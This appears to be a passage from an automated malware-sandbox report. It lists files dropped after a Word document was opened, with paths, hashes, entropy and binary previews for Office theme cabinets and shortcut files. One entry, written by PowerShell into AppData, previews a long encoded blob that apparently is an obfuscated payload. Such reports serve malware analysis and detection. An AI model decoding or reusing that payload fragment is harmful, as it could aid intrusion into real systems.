                                                                                                                                              Preview:MSCF....]M......D...............=...........]M...?..........}..."..............Li. .content.inf............Li. .Gallery.thmx.].(.Vq..[.....0Y..........v.....w.wwwww.wwwwww.w.....".83....y8..mg...o*..U..N(..@uD.:O<........{.G....~~.....c.c.5..6./|G .@#1O.B.............PT@...b.d.~..U....B.{.........0.H.....`.H.`..'S.......Ic..W..x...z....... .........g......._....o......S......p...$....._........._...K......x..?.6.U~...'./.r.................../.......5.8..2........2b.@j ....0.........``....H... ,5...........X........|..Y.QoiW..*|.......x.sO8...Yb....7...m..b.f.hv..b......=...:Ar.-...[..A\.D..g..u....].9..M...'.R-`.....<..+.....]...1.^..I.z..W{.._....L.. ...4;..6O.....9,.-.Vt+b/$7..}.O05.Y...-..S.....$*.....1."Z.r;.!..E.mMN..s .U...P%.[.P...cU...j...h.d.../.s..N/..:..X*...p5.7\}h.Q ..._.F.X.C..z$.nV..+.k..|.@.L...&.........^#.G.a..x..w!wx.8e+..E. i..$?9..8...:......|..[."..y..&y..?...W....s..._...3Z0c.....i.q.........1c.jI....W..^%xH.._...n.......&J..

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab6F40.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 1049713 bytes, 2 files, at 0x44 +A "content.inf" +A "Savon.thmx", flags 0x4, ID 60609, number 1, extra bytes 20 in head, 37 datablocks, 0x1503 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1065873
                                                                                                                                              Entropy (8bit):7.998277814657051
                                                                                                                                              Encrypted:true
                                                                                                                                              SSDEEP:24576:qehtHA3nsAOx7yN7THwxdGpkw8R60aTcua5U4c:hhmnsBMNAxdGpV5za5Uv
                                                                                                                                              MD5:E1101CCA6E3FEDB28B57AF4C41B50D37
                                                                                                                                              SHA1:990421B1D858B756E6695B004B26CDCCAE478C23
                                                                                                                                              SHA-256:69B2675E47917A9469F771D0C634BD62B2DFA0F5D4AF3FD7AFE9196BF889C19E
                                                                                                                                              SHA-512:B1EDEA65B6D0705A298BFF85FC894A11C1F86B43FAC3C2149D0BD4A13EDCD744AF337957CBC21A33AB7A948C11EA9F389F3A896B6B1423A504E7028C71300C44
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MSCF....q.......D...........................q... ?..........{...%..............M. .content.inf.Q_.........M. .Savon.thmx...O>.o..[..............&.5....UUcC.C....A...`TU...F....".54.E.....g.-.7-D....1g...p.6......@..w(....h'?.....(..........p..J.2n$4.........A......?...........@.C.W.R.5X..:..*..I..?....r.y..~!.....!.A.a...!........O.........5.x<C...?.?....C.C.......'....F../....../.$................4.7...................P...(.w.}6.........7.....01.1r........._..?.............'.._..JOx.CFA<.........*0..2.?...>F.../...;..6-8..4...8&yb....".1%..v'..N...x......}.gYb..~L.....f[..!......Y.G.....p..r...?.p...F.Vy.....o.Whll...+...M.V...:.]...B.%.H....n..@.].zaVxf...y{.@....V.t.W....$Kp-.....7W.J..h..0A3mK.=.ub..R...W......*'T2..G#G,.^..T..XZu...U. ...76.d..#.I.JB.v...d...%.....6..O.K.[.:.L.\.....1.D..2a.>f......X...b5...ZgN.u.f...a!..."...sx....>..?.a.3.8.^._q..JS1.E..9..Lg.n.+....lE.f:j.9)Q..H1=..<.R.......{c>:.p[..S.9h.a.gL.U....8.z..z.!.....2I.~.b..2..c...

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab6F6F.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 1081343 bytes, 2 files, at 0x44 +A "Circuit.thmx" +A "content.inf", flags 0x4, ID 11309, number 1, extra bytes 20 in head, 45 datablocks, 0x1503 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1097591
                                                                                                                                              Entropy (8bit):7.99825462915052
                                                                                                                                              Encrypted:true
                                                                                                                                              SSDEEP:24576:UE9BMy98gA4cDWHkSrDans3MfEE6w8OaVuCibol0j41dwD:UE9Bdy3D4keQWt7w85VuVoaj4/Q
                                                                                                                                              MD5:BF95E967E7D1CEC8EFE426BC0127D3DE
                                                                                                                                              SHA1:BA44C5500A36D748A9A60A23DB47116D37FD61BC
                                                                                                                                              SHA-256:4C3B008E0EB10A722D8FEDB325BFB97EDAA609B1E901295F224DD4CB4DF5FC26
                                                                                                                                              SHA-512:0697E394ABAC429B00C3A4F8DB9F509E5D45FF91F3C2AF2C2A330D465825F058778C06B129865B6107A0731762AD73777389BB0E319B53E6B28C363232FA2CE8
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MSCF............D...............-,..............x?..........}...-...RU.........M. .Circuit.thmx.....RU.....M. .content.inf.g...&|..[......=..R.....=.*,.!QA?h..Q.!....Uk!.HJ.......VKuk.....q.w.w.U.....;...K.@.URA..0..B..|rv.ND(.`{..@.1.}...s?.....-...O.(V.w..1..a.....aW...a.Z..aX....5.I...!..........(. ./.d...me.( ..f.........w.......Xp.s....c..vB.98.....C.J......V ..ML.M...B.n.>...|....u!.5@t..q4....(K...u qL.S....>/%v%.2..TF.].e..'..-..L.N..c].a..(WU\o.%^..;...|o.6..L..[..;&....^p.Lu.sr,-.R=.:.8.>VOB...:.?$.*h.o....Zh.h....`.B.c.../K......b^...;2..bY.[.V.Q8....@..V7....I0c.cQN7..I.p..}..!..M....1K....+....9.2......a..W.V..........;.J .i......]%O.-......CeQ.0.c....MbP3.0.w..8w..Y...|...H;#.J.+M......>.`y..aWk|.i.BF.pJv;.....S..6....F.....RLG~..........J.=......"..........H.....h..o...u........M.6F?.F.p.B.>./*l....J.R..#P.....K......<iu..gm^..n...#c..zO"7M.O......4'>A..(.E.Cy.N.)....6.tx.r[.....7.......m.t..E?.....5.5.6.\..{.V.T.D.j..=~a^.I

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab7118.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 1291243 bytes, 2 files, at 0x44 +A "content.inf" +A "Droplet.thmx", flags 0x4, ID 47417, number 1, extra bytes 20 in head, 54 datablocks, 0x1503 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1310275
                                                                                                                                              Entropy (8bit):7.9985829899274385
                                                                                                                                              Encrypted:true
                                                                                                                                              SSDEEP:24576:NN3M9UHpHZE4aubaPubP3M6d71FdtmFAjq+54/79LVzG+VnS:NN3M9UJHZE4abPyU4JtmFCq+q/7JlVS
                                                                                                                                              MD5:9C9F49A47222C18025CC25575337A965
                                                                                                                                              SHA1:E42EDB33471D7C1752DCC42C06DD3F9FDA8B25F0
                                                                                                                                              SHA-256:ADA7EFF0676D9CCE1935D5485F3DDE35C594D343658FB1DA42CB5A48FC3FC16A
                                                                                                                                              SHA-512:9FDCBAB988CBE97BFD931B727D31BA6B8ECF795D0679A714B9AFBC2C26E7DCF529E7A51289C7A1AE7EF04F4A923C2D7966D5AF7C0BC766DCD0FCA90251576794
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MSCF...........D...............9..............XJ..........}...6..............M.. .content.inf............M.. .Droplet.thmx..m7.>J..[...............2.QQPIj.*.."o^R.H5*^...^(e.W...R..x..^`..m...."..+.....{o.......Q.-....$V.N>...T]..L.... ..N.h..dOY.......S......N.%.d..d....Y.....e..$...<.m...`............@....=.z..n..[...,G..1Fn.qPDH{C<...3.Q...2..r..*...E.E.E.ErM"&a..'..W....:...?I..<.I..6o.`.d.?!..!..._.4\.._.E..).._O.S....; ..#..p.H.....c....o\.K..?$U.e.........!...J.v.....gNe._..[....#A.O.n_.....gm:P._.........{@..-g..j.69b.NH.I.$Hk?.6.n...@......'.C.._.U..:*,j.-G.....e.#.Sr.t.L......d[.[...s.....rx.3.F[.5o..:....K*.x..)M.fb...3IP.&h.Q.VX^%U.......x..l......@6.k.P..zSW.?....F..[L...4..b.l.w."&.....`.j...i.5}".~.-.....{\.:...o.'H\*+)....3.Y......\...f:.;....e........4't7..f...w..j...3....N..9`.J...P..?.....=3_.y]...f.<.......JM5.}Q/ .F.a..Z.._yh......V..>m .......a....f....!.hz..\.....F_..'z...,....h.=.......=.o..T....3.e..........$..g.2.

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab73F9.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 1865728 bytes, 2 files, at 0x44 +A "content.inf" +A "Damask.thmx", flags 0x4, ID 63852, number 1, extra bytes 20 in head, 68 datablocks, 0x1503 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1881952
                                                                                                                                              Entropy (8bit):7.999066394602922
                                                                                                                                              Encrypted:true
                                                                                                                                              SSDEEP:49152:6Wp9u/ZAvKz7ZFCejPiSmYXKIr6kBwBUA:6W6Bn7ZFNiiKo2l
                                                                                                                                              MD5:53C5F45B22E133B28D4BD3B5A350FDBD
                                                                                                                                              SHA1:D180CFB1438D27F76E1919DA3E84F307CB83434F
                                                                                                                                              SHA-256:8AF4C7CAC47D2B9C7ADEADF276EDAE830B4CC5FFE7E765E3C3D7B3FADCB5F273
                                                                                                                                              SHA-512:46AD3DA58C63CA62FCFC4FAF9A7B5B320F4898A1E84EEF4DE16E0C0843BAFE078982FC9F78C5AC6511740B35382400B5F7AC3AE99BB52E32AD9639437DB481D1
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MSCF.....x......D...............l............x..`?..........|...D..............M[. .content.inf...!........M[. .Damask.thmx...o.PI..[.............../.TU.jj0..3jCUPU.jF...m.UU.P}.....PU..*........w..#....E..].................A.. w.$..@..'g.......6%:..r9..d.M;M+.r.8[d{.s..dh..(P..........!.. ..ne..f.Nc..#..Y..q....KB}..b].@..F.&.t....E.........@&.m......$w......q...:.H....p.p.....?.9x.. .....?...ao....I....................o......g.u..;."....O;....{..(k..._.w/.Z......Jb..P.O?...........?....F....ty..72......! #....v..J......?.....!,.5.7..Em.....is.h.. \.H*)i1v..zwp.....P.....x].X{O//..\....Z>z....6...+..a.c...;.K..+...?014..p.w%o^.....]...MguF...`....r.S.......eF..):.dnk#.p{..<..{..Ym...>...H......x.}.hI..M....e......*G.&.?..~.~G6.....+...D..p...._...T....F6.[Cx./Q..Xe.>.;.}>.^..:..SB.X..2.......(A..&j9....\\.......Haf+]Y...$t^Y=........><.w....tL../E...%6.Vr~MI...l.....<.0.I....7.Q8y.f.uu...I.p..O..eYYS.O......9..Qo.......:..........o.............{

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab7419.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 1750009 bytes, 2 files, at 0x44 +A "content.inf" +A "Slate.thmx", flags 0x4, ID 28969, number 1, extra bytes 20 in head, 72 datablocks, 0x1503 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1766185
                                                                                                                                              Entropy (8bit):7.9991290831091115
                                                                                                                                              Encrypted:true
                                                                                                                                              SSDEEP:24576:O/gjMj+RP9Q07h9F75a0BXjBccHMVk2Hq2SkGa0QglyZtxmdPP2LcSUtfgfp16Yx:kJ6RP9Q07/X5V7yVF0QgktxAPutUt0zP
                                                                                                                                              MD5:828F96031F40BF8EBCB5E52AAEEB7E4C
                                                                                                                                              SHA1:CACC32738A0A66C8FE51A81ED8E27A6F82E69EB2
                                                                                                                                              SHA-256:640AD075B555D4A2143F909EAFD91F54076F5DDE42A2B11CD897BC564B5D7FF7
                                                                                                                                              SHA-512:61F6355FF4D984931E79624394CCCA217054AE0F61B9AF1A1EDED5ACCA3D6FEF8940E338C313BE63FC766E6E7161CAFA0C8AE44AD4E0BE26C22FF17E2E6ABAF7
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MSCF............D...............)q..............0?..........{...H..............M.. .content.inf.;.#........M.. .Slate.thmx.p.+..P..[......U..............p..K.!.......*...K..w..v........=....D$r...B....6 ...X.F0..d..m.s...$$r........m.)6.m3....vXn.l..o...a...V......Ru.:=2M.........T.....4S`EP......\..r,..v...G.P......'._H0]..%_............X.P.,.............H.?.-.H..".......M..&..o....R........<......`...D.H.._.G.Qv..(.*.U,.9..D...."..T..i.e../.e.."....,S...o.X.....c./..V....Z..o.O..2....{...+... ....0.@J.R.Q.m.....{.....h?u.q.O{...l.d)..Yk`.....#...u.-.m..#CXwrz4..7.>......v.E:.#.oGSKS.TX.Chm.4aQ......avH..{..j+@6[k].....`c..W8..j.v.Zh.]....4......K..#Hzyd..K}.....H|<H..\(l...+..%Z......~.S:^..d>..1..H%..7N-v.....Wu.*..b^.B.....k0gc.2.{.!...E7.}3.d...{.Ye...&#f6...:2......v..&!..k0d.p.b...,..$.....Y..60...h.N}.r...<[./........{...Es..&.nf.....2.@Fh3.9.G....l.[.C..SD/6.H.K....}..m....M..........gl.P.]..I......5....e.c...V....P...[.=.......O.eq+

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab77F4.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 2573508 bytes, 2 files, at 0x44 +A "content.inf" +A "Mesh.thmx", flags 0x4, ID 62129, number 1, extra bytes 20 in head, 94 datablocks, 0x1503 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2591108
                                                                                                                                              Entropy (8bit):7.999030891647433
                                                                                                                                              Encrypted:true
                                                                                                                                              SSDEEP:49152:ZSBBeAefkpB5iXfQJgi7JBaCCRZ3cM2VDHkvSJO6qzI1tE9Rn:EBI6gbCkMPDHKSJO6qsP6n
                                                                                                                                              MD5:BEB12A0464D096CA33BAEA4352CE800F
                                                                                                                                              SHA1:F678D650B4A41676BA05C836D462F34BDC5BF648
                                                                                                                                              SHA-256:A44166F5C9F2553555A43586BA5DB1C1DE54D72D308A48268F27C6A00076B1CA
                                                                                                                                              SHA-512:B6E7CCD1ECBB9A49FC72E40771725825DAF41DDB2FF8EA4ECCE18B8FA1A59D3B2C474ADD055F30DA58C7E833A6E6555EBB77CCC324B61CA337187B4B41F7008B
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MSCF.....D'.....D............................D'..D..........z...^..............M7. .content.inf............M7. .Mesh.thmx....&~j..[.....0.................]............ww,v.\....D......3m..m!f..0..E{..?..`..A...k.:....I..........|bmG.FS...f.;.J.vzb.......R.......-....|.......ESD.....".4M..M..t.N....y..,..#.4.5.2.......'.8.Q..3.D..T....!.......&rJg...s........(..9........Dw..'....9.-..G.c............E.. .O.....a..O.._..s..)7Wz~....bJ..D...o....0..R/.#...?.......~6.Q?....?y...g.?............TP..r-...>....-..!.6...B.....\../...2....4...p$...Oge.G.?.....S.#x(..$.A~.U.%f....dJ..S.f{.g.._..3{.fm2.....Z.\o&.[k.m....ko.8..r.-.Go.OQ..'!6..f.L...Ud.$.q*.L.....R.. J.T&4g...7.2K...#k.[.].:....lk.....;c..DRx.`..&L..cpv*.>.Ngz~.{..v5.\...'C.<R:.C8.|.fE{......K...).....T...gz}..rF..Q.dof7.....D.f=cm...U|.O.]F...5zg(.. ....S..._?D....^..+.i...Z.....+X..U!4qy..._..`I..>./.W.7......=.O....BG..=..%9|...3.?...}.$"..H..u...0.......a..:t?.....8...Z..#g.=<.e.`\......KQ..U....

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab77F5.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 2511552 bytes, 2 files, at 0x44 +A "content.inf" +A "Main_Event.thmx", flags 0x4, ID 59889, number 1, extra bytes 20 in head, 90 datablocks, 0x1503 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2527736
                                                                                                                                              Entropy (8bit):7.992272975565323
                                                                                                                                              Encrypted:true
                                                                                                                                              SSDEEP:49152:NFXdpz4d98p/q5jA4q+9Uf5kx6wHR8WfPJZVhWzH4dRze76YP9nJ7yyAInT76nSY:NFXdKx5sM9SmxHKexZVhutJJVpCSqa0Z
                                                                                                                                              MD5:F256ACA509B4C6C0144D278C7036B0A8
                                                                                                                                              SHA1:93F6106D0759AFD0061F73B876AA9CAB05AA8EF6
                                                                                                                                              SHA-256:AD26761D59F1FA9783C2F49184A2E8FE55FCD46CD3C49FFC099C02310649DC67
                                                                                                                                              SHA-512:08C57661F8CC9B547BBE42B4A5F8072B979E93346679ADE23CA685C0085F7BC14C26707B3D3C02F124359EBB640816E13763C7546FF095C96D2BB090320F3A95
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MSCF.....R&.....D............................R&.8?..............Z..............M). .content.inf..,........M). .Main_Event.thmx......R..[...............=.1.^xa..^...../..^x....QA^"....^/.I.{/F..F..........6Vn. ..._Hmc......<....#.{.@.....Xl../Y....Ye..'V.f.S.Vf.T..0t+..y...5O...{.....-.dT...........!...[ .ns..k.....QAA.. ....B..u.`.....{.\u8.0.....@t........K....@..w.......>...-1F...........1.E....O............_M.m..CP.O......X......g......].../..:C...Q...i.._"...M..1o...S../...9....k;...}S........y..;1o....1h......t.CL.3...].@...T...4.6.}.....M...f...[.s.."f....nZ.W......0.c.{.`.^..Oo.[.JT.2].^.f..a....kO......Q..G..s.5...V.Wj.....e...I,]...SHa..U.N.N.....v.C.....x..J{.Z.t...]WN...77BO-J......g......3:i..2..EFeL.,n..t:..,~4gt.w...M.5.'h.L..#..A&.O.ys%K.Z....F.PW..=jH...jGB.i..j.J.^.#.\n...J@.....-5.f.1jZ68.o...H2.......$O...>..ld&,#$.&_....yl.fkP$.........l....s....i.tx.~<.z...>..2.Gx..B..z.E.3.N<....`$.....b..?.w.[.X..1.=q!.s......v.......r.w

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab7C5D.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 3239239 bytes, 2 files, at 0x44 +A "content.inf" +A "Vapor_Trail.thmx", flags 0x4, ID 19811, number 1, extra bytes 20 in head, 111 datablocks, 0x1503 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):3256855
                                                                                                                                              Entropy (8bit):7.996842935632312
                                                                                                                                              Encrypted:true
                                                                                                                                              SSDEEP:98304:wh7I1aeH9YvgK+A+a7GiiQzP4YZDpQ2+Sd6Y:w21ay93aypQzzhpBL/
                                                                                                                                              MD5:8867BDF5FC754DA9DA6F5BA341334595
                                                                                                                                              SHA1:5067CCE84C6C682B75C1EF3DEA067A8D58D80FA9
                                                                                                                                              SHA-256:42323DD1D3E88C3207E16E0C95CA1048F2E4CD66183AD23B90171DA381D37B58
                                                                                                                                              SHA-512:93421D7FE305D27E7E2FD8521A8B328063CD22FE4DE67CCCF5D3B8F0258EF28027195C53062D179CD2EBA3A7E6F6A34A7A29297D4AF57650AA6DD19D1EF8413D
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MSCF....Gm1.....D...............cM..........Gm1..D..............o... ..........MP. .content.inf...7. ......MP. .Vapor_Trail.thmx..n...N..[......L........7...+I..x...P7/...BH..Rm.\yqi.x..B....{.m.............=.....p.%.@......BpV.[......C.4..X./..Y.'SB..........0.Gr.FG.).....R\...2..Jt..1..._.4_B..................cn7H.-.....Q...1..G{G.~.. '.$......@.(....=@=..`....@.@.A. ....'.4`. .@....D...'....S.s..9.7" /....?.aY.c.........LG....k...?_.....P.....?.1.....FB..m..t...['......:...?...W..../~..z.Tr...X.@...._....3..N..p.....b...t.....^..t...~..t.8A...t_....D..3R.Z.=..{.A.8).3-5..v.isz....0A~%.s.D.4....k.K......8......)R.}f.E..n.g&:W...'E....4%T..>......b.y..[..zI....e...j.s....F.....|7826U.C.,..BY.U.F.f......"..#.m..,..._...#.\.....gPP.2.}Kas......g..3.d0.Z.Z.]..n......MY]6.....].m..D.6...?.n.20.,.#...S...JK..#.W.%.Z4.....i..CBf...../..z......n.N...U.....8t...ny...=.!..#..SF..e...1.P..@.Qx*.f.;..t..S.>..... F..)...@.Y..5j....x....vI.mM....Z.W..77...

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab7CFC.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 3400898 bytes, 2 files, at 0x4c "Insight design set.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 106 datablocks, 0x1203 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):3417042
                                                                                                                                              Entropy (8bit):7.997652455069165
                                                                                                                                              Encrypted:true
                                                                                                                                              SSDEEP:98304:1YYkj2mRz6vkkB15AW4QD0ms+FdniD60bDUpS:qYkj7d6vP7NZDLn+PM8
                                                                                                                                              MD5:749C3615E54C8E6875518CFD84E5A1B2
                                                                                                                                              SHA1:64D51EB1156E850ECA706B00961C8B101F5AC2FC
                                                                                                                                              SHA-256:F2D2DF37366F8E49106980377D2448080879027C380D90D5A25DA3BDAD771F8C
                                                                                                                                              SHA-512:A5F591BA5C31513BD52BBFC5C6CAA79C036C7B50A55C4FDF96C84D311CCDCF1341F1665F1DA436D3744094280F98660481DCA4AA30BCEB3A7FCCB2A62412DC99
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MSCF......3.....L.............................3..?..............j.....3.....t.4.............Insight design set.dotx.................Content.inf...QJ.N..[.........R.....L....N).J|E.B.$.B).3,...n.....JW....k.U1..M...3#.5....$^.....;vR...Z.nj...#......^*......a.{..(..o.v...!L`...T.-&jZ`.\.*0.....G.."b.m..F.X......$>%..?.D..H.l.j....$.......MrQ......q-....hx...6.D.3...j....n..U#R..3....sm?..xJr..............$G8..t.g...?.g.}......$P._...7.#..w..9DR....*lu....?..'.Ai..v.vl..`......B..N_....W./.;...c=oYW.lL'bv.......+...9.P..B=...*Y.SX=EL.5o....?H.e|.Fn.M[...d.v.....i......9..U..H....uq.Nrn..@..e...3....8.....s8}z..$........B....26...d..?.l....=.aeM.[..|n....H.;..7A.`....=.F...V.Y.l..8.........%e.x0S.....~..2..%.....U..#.r_.0V.v.6w.l.......Y.........v..o+....*sn.$^'.Il...akUU....w....~.....&8.Vwj.....Q.uQ..&..G.($.2.s.?m.B.~j.*..+G.W..qi..g..5.)){O........o.ow.(;.{...y;n...J...&.F2.@.;......[{'w..........`....czW.........?W...}..w....x..........

                                                                                                                                              C:\Users\user\AppData\Roaming\Even.Lar

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):460840
                                                                                                                                              Entropy (8bit):5.948551648299628
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12288:an0wPZKMSYhbyhOlA2XF9nAjZKZKYdbjIPqJtVW71A:CfwhOW2XF9nRKYdbcqJtVW71A
                                                                                                                                              MD5:D0B7DD542D1B8C90D77315A58B37AA65
                                                                                                                                              SHA1:6FB0E42FEE626D28E24EDFB8E71E43FFCDF057C1
                                                                                                                                              SHA-256:EF2293FB054BFF28966408C57439C060BD2E1F53F2BDDC3807338AB8DE8CC8BC
                                                                                                                                              SHA-512:01B548BBA8EF070E05B5626445CB79E8A0D0D0C3000341343A8473B9CFBB1EDCDE2C644C805038D15C54852B4F7C46F42A7F77F63EBEF2EEBB7DED1CABCD012F
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:6wKZOusCsTq747UXAOsCRvlxAZsDXCQEcQGb6wKAMLnhnErDcQGb6wJnPYHpFfCXq3EBm+sCtTyBwTRTTejrAo0r6wIzUusC7ytxAZu6EDLBIusCZgvrAsnYcQGb6wIw4DHK6wIIlXEBm4kUC3EBm3EBm9HicQGb6wK6NIPBBHEBm3EBm4H53TyGBHzNcQGbcQGbi0QkBHEBm3EBm4nDcQGb6wIR2YHDbv1QA3EBm3EBm7qs0emj6wK6pHEBm4HyYwRPOesCS1jrAnNngerP1aaa6wLOBesCmrNxAZvrAjPKcQGb6wI/HIsMEOsCqX1xAZuJDBNxAZvrAsodQnEBm3EBm4H6iNkEAHXW6wLgm3EBm4lcJAzrAhBJcQGbge0AAwAA6wJLznEBm4tUJAjrAsEi6wIUo4t8JATrAqujcQGbietxAZtxAZuBw5wAAADrAokWcQGbU3EBm3EBm2pAcQGbcQGbietxAZvrAtf4x4MAAQAAAAChBHEBm+sCH1aBwwABAADrAqXncQGbU3EBm+sCLWCJ63EBm3EBm4m7BAEAAHEBm3EBm4HDBAEAAOsCzfvrAjZmU3EBm+sC1rtq/3EBm3EBm4PCBXEBm3EBmzH26wIimXEBmzHJ6wLsAnEBm4sa6wJtBnEBm0FxAZtxAZs5HAp19HEBm+sC62JG6wJCA+sC5HaAfAr7uHXdcQGb6wKcx4tECvxxAZtxAZsp8HEBm+sCUoL/0nEBm3EBm7qI2QQAcQGbcQGbMcDrAtBk6wJPFIt8JAzrAtYocQGbgTQHOe+VDXEBm+sCAn+DwARxAZtxAZs50HXl6wJ5BesC8L6J+3EBm3EBm//X6wJLiHEBm70JfQ0575Vfg/lRn0Fub40575UCvfVSCTm1zjXNZnDKvOFq8sYlXp2pbhADxhBqEVbkwYyM4WryxnDTr8duEAPGEGqKvy5wQcZim/LGEOD6X9ZdWF9ubl28ZnC0QlOH084pgddf/azeuB5E

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\MSO3072.acl

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):30
                                                                                                                                              Entropy (8bit):1.2389205950315936
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:q9IX:q9
                                                                                                                                              MD5:31C44DFDDE2171417653D64609D3CE08
                                                                                                                                              SHA1:8F26199F636FDD15A97F0D7068349A5A6DD18132
                                                                                                                                              SHA-256:538517A92DFD0C1B6CB4F3413F019944F63236FA7DE5A6A9A65D81757B8F173D
                                                                                                                                              SHA-512:11FE2D2ED2DA7A94384ADE31EA15990F18A6CA33898AA33D1B90F47DCE28816DD9B3F31CF3E5A5C4347653D061E1D3A518419521A74561194B6024275D9B17BC
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..............................

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Generic INItialization configuration [folders]
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):55
                                                                                                                                              Entropy (8bit):4.240070623830714
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:HcBGS4+Um4/4+Uv:H+xgx2
                                                                                                                                              MD5:CF2CE6D41BE0E90BC70BEFB773231FA0
                                                                                                                                              SHA1:C48A07B1F197AEF1ADC5F973FBDD84431EC06D80
                                                                                                                                              SHA-256:A61BF3963A66744FFEE8E873763133F2FF21A8E84F074D8F897D163E08042EEE
                                                                                                                                              SHA-512:2727C380AB2AAC8158453FEAF3E53404255726BB3828BF029F21706E1213162324EB58AC872B93F6049875EA1ABF720AE43F625FE7638FE65EEC00603758DA0C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:[misc]..rdc7di6ccs.LNK=0..[folders]..rdc7di6ccs.LNK=0..

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\rdc7di6ccs.LNK

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Dec 18 17:26:37 2024, mtime=Wed Dec 18 17:26:41 2024, atime=Wed Dec 18 17:26:37 2024, length=13373, window=hide
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):975
                                                                                                                                              Entropy (8bit):4.641594996321554
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:8pVFUlGImCICHqXSyRnXU3ACmEWGwvRQ9QGajArV/WKBGeNvlw44t2YZ/elFlSJX:8p2GFV/EFioCArDvlPqyFm
                                                                                                                                              MD5:4C776EB5CE36174C32828A2A7539B7A3
                                                                                                                                              SHA1:B4FE3E9389FB0982E4302AFF5E766E9BF7DDCD3E
                                                                                                                                              SHA-256:85DF9EF5DADC6ADCBA9EFA285021687D1B671F984C85223872B823F5E19FF59C
                                                                                                                                              SHA-512:177A1CEB18CB63B16DE7E80DFEFD36800C3CBC5C9725CC561F68DAB3C19B87811C10F5019665FEE699ECD9F5E09B26EBF25DF9F745D6BE2810968B648B433466
                                                                                                                                              Malicious:false
